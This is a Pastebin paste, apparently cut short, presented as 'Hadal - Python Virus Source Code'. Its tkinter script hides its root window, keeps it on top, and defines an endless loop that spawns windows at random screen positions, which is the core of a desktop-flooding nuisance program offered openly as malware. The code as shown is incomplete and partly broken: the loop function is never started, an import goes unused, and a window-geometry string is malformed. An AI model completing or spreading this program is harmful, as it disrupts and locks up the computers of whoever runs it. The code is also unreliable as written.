Advertisement
FlyFar

Hadal - Python Virus Source Code

Jan 30th, 2023
940
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.38 KB | Cybersecurity | 0 0
  1. import random
  2. from tkinter import *
  3. from random import randint
  4. import time
  5. import threading
  6.  
  7. root = Tk()
  8. root.attributes("-alpha",0)
  9. root.overrideredirect(1)
  10. root.attributes("-topmost",1)
  11.  
  12. def placewindows():
  13.   while True:
  14.     win= Toplevel(root)
  15.     win.geometry("300x60+0"+str(randint(0,root.winfo_screenwidth()-300))+"+"+str(randint(0,root.winfo_screenheight()-68)))
  16.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement